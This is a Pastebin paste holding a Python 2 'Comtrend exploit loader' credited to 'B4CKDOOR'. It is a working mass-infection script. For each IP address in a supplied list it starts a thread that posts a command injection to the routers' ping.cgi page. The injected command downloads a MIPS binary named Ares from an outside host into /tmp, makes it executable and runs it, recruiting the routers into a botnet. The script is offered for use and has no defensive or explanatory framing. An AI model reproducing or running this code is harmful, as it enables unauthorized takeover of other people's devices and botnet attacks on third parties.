Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- # COMTREND EXPLOIT LOADER MADE BY B4CKDOOR #
- # B4CKDOORARCHIVE.CLUB [NEWDOMAIN] | JOIN DISCORD BY WEBSITE INVITE LINK #
- import threading, sys, time, random, socket, re, os, struct, array, requests
- from threading import Thread
- from time import sleep
- import requests
- from requests.auth import HTTPDigestAuth
- from decimal import *
- if len(sys.argv) < 2:
- print "\033[37mUsage: python "+sys.argv[0]+" <list>\033[37m"
- sys.exit()
- ips = open(sys.argv[1], "r").readlines()
- payload = 'cd /tmp; wget http://1.3.3.7/Ares.mips; chmod 777 Ares.mips; ./Ares.mips comtrend'
- class b4ckdoor(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- try:
- print "[COMCOM] INFECTING - " + self.ip
- url = "http://" + self.ip + "/ping.cgi?pingIpAddress=google.fr;"+payload+"&sessionKey=1039230114'"
- requests.post(url, timeout=2)
- except Exception as e:
- pass
- for ip in ips:
- try:
- n = b4ckdoor(ip)
- n.start()
- time.sleep(0.03)
- except:
- pass#CODED BY B4CKDOOR
Add Comment
Please, Sign In to add comment